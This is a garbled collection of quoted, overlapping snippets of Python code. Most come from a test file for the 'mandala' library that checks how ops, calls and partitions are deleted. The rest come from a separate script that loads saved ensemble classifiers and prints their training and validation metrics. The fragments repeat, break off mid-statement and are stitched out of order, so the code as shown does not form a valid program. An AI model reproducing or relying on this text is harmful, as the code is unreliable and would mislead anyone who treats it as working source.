in nums] return [elt for", "= [inc(x) for x in nums] final = mean(x=incs) c.commit() # delete only", "d.commit_deletions() # check it got deleted but earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op,", "run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums)", "df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting", "for num in nums] return [elt for divs in divisors_list for elt in", "in range(10, 20): inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10", "== 10 storage.drop_instance_data(answer=True) ### test isolation of commits between partitions with run(storage, autocommit=False,", "42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls at once ############################################################################ with run(storage=storage)", "add(23, 42) c.commit() ### delete the work with delete(storage=storage) as c: x =", "c: x = add(23, 42) c.commit() ### delete the work with delete(storage=storage) as", "after committed work with run(storage, autocommit=False) as c: for i in range(10): inc(i)", "from .funcs import * from .conftest import setup_tests def test_simple(setup_tests): storage, cts =", "@op(storage) def add(x:int, y:int) -> int: return x + y ### drop empty", "20): inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ###", "assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things only ############################################################################", "import setup_tests def test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################ ### unit ############################################################################", "c.commit() with query(storage=storage) as c: x, y = Any(), Any() z = add(x,", "verifying vrefs remain orphaned ############################################################################ with run(storage) as c: nums = range(10) incs", "y=42, z=5) with delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def", "num % x == 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num)", "= storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as c: nums = range(10)", "deleting operations are isolated to prevent schema changes across tests \"\"\" storage =", "rename=True) assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying", "as c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False) as c:", "inc(i) c.commit() with run(storage, autocommit=False, partition='second') as c: for i in range(10, 20):", "for i in range(10, 20): inc(i) with run(storage, autocommit=False, partition='third') as c: for", "Tests for deleting operations are isolated to prevent schema changes across tests \"\"\"", "return x + 1 @op(storage) def add(x:int, y:int) -> int: return x +", "not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True): for i in range(10): inc(i) ### drop", "rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True)", "in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs()", "autocommit=False, partition='third') as c: for i in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs())", "as c: x, y = Any(), Any() z = add(x, y) df =", "in chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums", "assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests", "c: for i in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30 storage.drop_uncommitted_calls()", "= add(23, 42) c.commit() with query(storage=storage) as c: x, y = Any(), Any()", "<reponame>amakelov/mandala<filename>mandala/tests/test_deletion.py from .utils import * from .funcs import * from .conftest import setup_tests", "divisors_list for elt in divs] @op(storage) def inc(x:int) -> int: return x +", "concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug(): storage = Storage() @op(storage) def get_divisors(num:int)", "in range(1, num) if num % x == 0] @superop(storage) def f(lst:TList[int]) ->", "with delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage", "= mean(x=incs) c.commit() # delete only latter part with run(storage=storage) as c: nums", "in nums] final = mean(x=incs) c.commit() # delete only latter part with run(storage=storage)", "for i in range(10): inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) ==", "run(storage, autocommit=False, partition='second') as c: for i in range(10, 20): inc(i) with run(storage,", "nums] final = mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x in incs] assert", "with run(storage, autocommit=False) as c: for i in range(10, 20): inc(i) assert len(storage.call_st.locs())", "add(x:int, y:int) -> int: return x + y ### drop empty op storage.drop_func(f=add)", "in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage,", "= mean(things) means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage) as c: things =", "10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying vrefs remain orphaned ############################################################################", "# check it got deleted but earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True)", "y ### drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True):", "c: for i in range(10, 20): inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert", "c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second') as c:", "several parts with run(storage=storage) as c: nums = range(10) incs = [inc(x) for", "return x + 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x) for x", "# run a workflow of several parts with run(storage=storage) as c: nums =", "deleted but earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df =", "with run(storage=storage) as c: x = add(23, 42) c.commit() ### delete the work", "num) if num % x == 0] @superop(storage) def f(lst:TList[int]) -> int: return", "only latter part with run(storage=storage) as c: nums = range(10) incs = [inc(x)", "run(storage): lst = get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\"", "final = mean(x=incs) d.commit_deletions() # check it got deleted but earlier things didn't", "mean(means) c.commit() with delete(storage=storage) as c: things = [] means = [] for", "some things only ############################################################################ # run a workflow of several parts with run(storage=storage)", "storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs()", "cts = setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ### do some work with", "30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 20 storage.drop_instance_data(answer=True)", "for x in chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage,", "assert not storage.call_st.locs() ### do computation again with run(storage=storage) as c: x =", "get_divisors(num:int) -> TList[int]: return [x for x in range(1, num) if num %", "range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage)", "test_drop_op(): \"\"\" Tests for deleting operations are isolated to prevent schema changes across", "as c: for i in range(10, 20): inc(i) with run(storage, autocommit=False, partition='third') as", "@superop(storage) def f(lst:TList[int]) -> int: return lst[0] with run(storage, autocommit=True): lst = get_divisors(100)", "== 0] @superop(storage) def f(lst:TList[int]) -> int: return lst[0] with run(storage, autocommit=True): lst", "delete(storage, autodelete=False) as c: nums = range(10) incs = [inc(x) for x in", "with c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions() # check it got deleted", "storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################ with run(storage, autocommit=True): add_three(x=23,", "0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num) for num in nums]", "as c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second') as", "final = mean(means) c.commit() with delete(storage=storage) as c: things = [] means =", "run(storage=storage) as c: nums = range(10) incs = [inc(x) for x in nums]", "[storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not", "z = add(x, y) df = c.qeval(x, y, z, names=['x', 'y', 'z']) assert", "add(x, y) df = c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt) for", "f(lst:TList[int]) -> int: return lst[0] with run(storage, autocommit=True): lst = get_divisors(100) f(lst) with", "c.commit_deletions() ### check if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty", "with run(storage, autocommit=False, partition='first') as c: for i in range(10): inc(i) c.commit() with", "results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts", "storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True): for i in range(10): inc(i) ### drop op", "add(23, 42) c.commit() with query(storage=storage) as c: x, y = Any(), Any() z", "nums] return [elt for divs in divisors_list for elt in divs] @op(storage) def", "+ y ### drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage,", "with run(storage, autocommit=True): lst = get_divisors(100) f(lst) with run(storage): lst = get_divisors(100) with", "### after committed work with run(storage, autocommit=False) as c: for i in range(10):", "c: x = add(23, 42) c.commit() with query(storage=storage) as c: x, y =", "storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying vrefs remain orphaned ############################################################################ with run(storage)", "Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for x in range(1, num)", "mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ###", "as c: things = [] means = [] for i in range(10): thing", "workflow of several parts with run(storage=storage) as c: nums = range(10) incs =", "= storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls", "\"\"\" storage = Storage() @op(storage) def inc(x:int) -> int: return x + 1", "check if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not", "== 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num) for num in", "operations are isolated to prevent schema changes across tests \"\"\" storage = Storage()", "i in range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second') as c: for i", "test_superops(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for x", "autocommit=False) as c: for i in range(10, 20): inc(i) assert len(storage.call_st.locs()) == 20", "things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage) as", "op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True): for i in range(10):", "earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True)", "############################################################################ with run(storage, autocommit=True): add_three(x=23, y=42, z=5) with delete(storage, autodelete=True): add_three(x=23, y=42, z=5)", "x in range(1, num) if num % x == 0] @superop(storage) def concat_divisors(nums:TList[int])", "f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for deleting operations are isolated to prevent", "-> int: return x + 1 @op(storage) def add(x:int, y:int) -> int: return", "assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying vrefs", ".conftest import setup_tests def test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################ ### unit", "'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True)", "= mean(means) c.commit() with delete(storage=storage) as c: things = [] means = []", "not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as c:", "j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage) as c:", "nums] with c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions() # check it got", "i in range(10): inc(i) ### drop op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc',", "commits between partitions with run(storage, autocommit=False, partition='first') as c: for i in range(10):", "all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################ with run(storage,", "0] @superop(storage) def f(lst:TList[int]) -> int: return lst[0] with run(storage, autocommit=True): lst =", "for i in range(10): inc(i) ### drop op with results storage.drop_func(f=inc) assert not", "autocommit=False, partition='first') as c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False,", "i in range(10, 20): inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) ==", "i in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30 storage.drop_uncommitted_calls() assert len(storage.call_st.locs())", "in range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second') as c: for i in", "inc(x:int) -> int: return x + 1 @op(storage) def add(x:int, y:int) -> int:", "remain orphaned ############################################################################ with run(storage) as c: nums = range(10) incs = [inc(x)", "latter part with run(storage=storage) as c: nums = range(10) incs = [inc(x) for", "y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage) def", "return lst[0] with run(storage, autocommit=True): lst = get_divisors(100) f(lst) with run(storage): lst =", "unit with run(storage, autocommit=False): for i in range(10): inc(i) assert len(storage.call_st.locs()) == 10", "storage.drop_instance_data(answer=True) ### test isolation of commits between partitions with run(storage, autocommit=False, partition='first') as", "Any(), Any() z = add(x, y) df = c.qeval(x, y, z, names=['x', 'y',", "[get_divisors(num) for num in nums] return [elt for divs in divisors_list for elt", "num % x == 0] @superop(storage) def f(lst:TList[int]) -> int: return lst[0] with", "run(storage, autocommit=False) as c: for i in range(10, 20): inc(i) assert len(storage.call_st.locs()) ==", "j in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit()", "in divs] @op(storage) def inc(x:int) -> int: return x + 1 @superop(storage) def", "do computation again with run(storage=storage) as c: x = add(23, 42) c.commit() with", "with run(storage=storage) as c: nums = range(10) incs = [inc(x) for x in", "c.commit_deletions() for func in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty", "df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying vrefs remain", "nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting", "final = mean(means) c.commit_deletions() for func in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op,", "for i in range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second') as c: for", "= storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10", "cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ### unit with run(storage,", "delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage =", "work with run(storage=storage) as c: x = add(23, 42) c.commit() ### delete the", "c.commit() # delete only latter part with run(storage=storage) as c: nums = range(10)", "test_bug(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for x", "are isolated to prevent schema changes across tests \"\"\" storage = Storage() @op(storage)", "= list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) ==", "Any() z = add(x, y) df = c.qeval(x, y, z, names=['x', 'y', 'z'])", "def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num) for num in nums] return [elt", "means.append(cur_mean) final = mean(means) c.commit_deletions() for func in (inc, add, mean): df =", "at once ############################################################################ with run(storage=storage) as c: things = [] means = []", "@op(storage) def inc(x:int) -> int: return x + 1 @op(storage) def add(x:int, y:int)", "assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test isolation", "func in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not", "run a workflow of several parts with run(storage=storage) as c: nums = range(10)", "once ############################################################################ with run(storage=storage) as c: things = [] means = [] for", ".utils import * from .funcs import * from .conftest import setup_tests def test_simple(setup_tests):", "[inc(x) for x in chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with", "as c: x = add(23, 42) c.commit_deletions() ### check if things got deleted", "20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test isolation of commits between", "didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0]", "inc_locs = [storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final)", "op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests):" ]
[ "as plt from joblib import dump, load from sklearn.model_selection import * # A", "print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM + NB + RF +", "clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv 1)", "printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM + NB + RF", "in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time)", "clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM + NB", "dump, load from sklearn.model_selection import * # A custom-made library for reporting from", "print(' VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best):", "Dec 2021. ##### BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time = printtimer(time.time())", "', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM", "my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>, MD. Dec 2021.", "MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN +", "reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>, MD.", "', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB +", "# A custom-made library for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer", "i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist())", "DF df_final = load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train, df_test, df_train_label,", "0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv", "library for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written by", "= df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) #", "i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist())", "= load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model", "time import matplotlib.pyplot as plt from joblib import dump, load from sklearn.model_selection import", "start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib') df = df_final[0]", "+ RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION #################", "import * # A custom-made library for reporting from my_eval_functions import set_seeds, get_clf_eval,", "READS DF df_final = load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train, df_test,", "Ensemble [KNN + XGB + SVM + NB + RF + ANN +", "(Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL", "1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM + NB +", "= load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i in", "printtimer # Written by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe, base,", "print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(),", "SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i])", "1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for", "get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM + NB", "+ NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) #################", "print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL", "# READS DF df_final = load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train,", "load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split", "printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib') df = df_final[0] df_label =", "load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i in range", "joblib import dump, load from sklearn.model_selection import * # A custom-made library for", "MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB", "matplotlib.pyplot as plt from joblib import dump, load from sklearn.model_selection import * #", "from sklearn.model_selection import * # A custom-made library for reporting from my_eval_functions import", "= load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label =", "print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN", "printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM + NB + RF +", "dataframe, base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final", "get_clf_eval, dingdong, printtimer # Written by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading", "MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE", "clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib')", "for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:,", "train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0) clflist", "TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ',", "##### BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) #", "import time import matplotlib.pyplot as plt from joblib import dump, load from sklearn.model_selection", "BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS", "LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================')", "df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib')", "(0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble", "# READS INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib')", "******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for", "<NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time", "print(' TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best):", "for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:,", "import matplotlib.pyplot as plt from joblib import dump, load from sklearn.model_selection import *", "set_seeds(123) # READS DF df_final = load('df_final.joblib') df = df_final[0] df_label = df_final[1]", "= load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ###", "print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL", "(df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0) clflist =", "READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************')", "SVM + NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist())", "ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING", "ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i", "SVM + NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_test_label.tolist(), ensemble_model.predict_proba(df_test)[:,1].tolist())", "2021. ##### BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123)", "* # A custom-made library for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong,", "+ SVM + NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_test_label.tolist(),", "TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n*****", "df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv", "VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ',", "+ NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_test_label.tolist(), ensemble_model.predict_proba(df_test)[:,1].tolist()) printtimer(start_time)", "get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in", "print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble", "clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM", "INDIVIDUAL 